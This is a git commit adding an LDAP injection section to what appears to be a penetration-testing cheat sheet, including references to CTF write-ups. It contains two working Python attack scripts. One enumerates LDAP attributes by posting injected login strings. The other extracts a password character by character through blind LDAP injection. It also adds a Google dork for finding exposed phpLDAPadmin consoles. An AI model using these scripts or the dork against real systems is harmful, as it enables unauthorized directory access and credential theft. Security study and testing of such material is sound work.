LDAPi: add scripts and dorks

This commit is contained in:
Alexandre ZANNI 2020-02-21 23:19:48 +01:00 committed by GitHub
parent 915946a343
commit f28f83bda6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -96,9 +96,69 @@ userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx
```
## Scripts
### Discover valid LDAP fields
```python
#!/usr/bin/python3
import requests
import string
fields = []
url = 'https://URL.com/'
f = open('dic', 'r') #Open the wordlists of common attributes
wordl = f.read().split('\n')
f.close()
for i in wordl:
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
if 'TRUE CONDITION' in r.text:
fields.append(str(i))
print(fields)
```
Ref. [5][5]
### Special Blind LDAP Injection (without "*")
```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
Ref. [5][5]
## Google Dorks
```
intitle:"phpLDAPadmin" inurl:cmd.php
```
Ref. [5][5]
## References
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
* \[5] [LDAP Injection - HackTricks][5]
[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection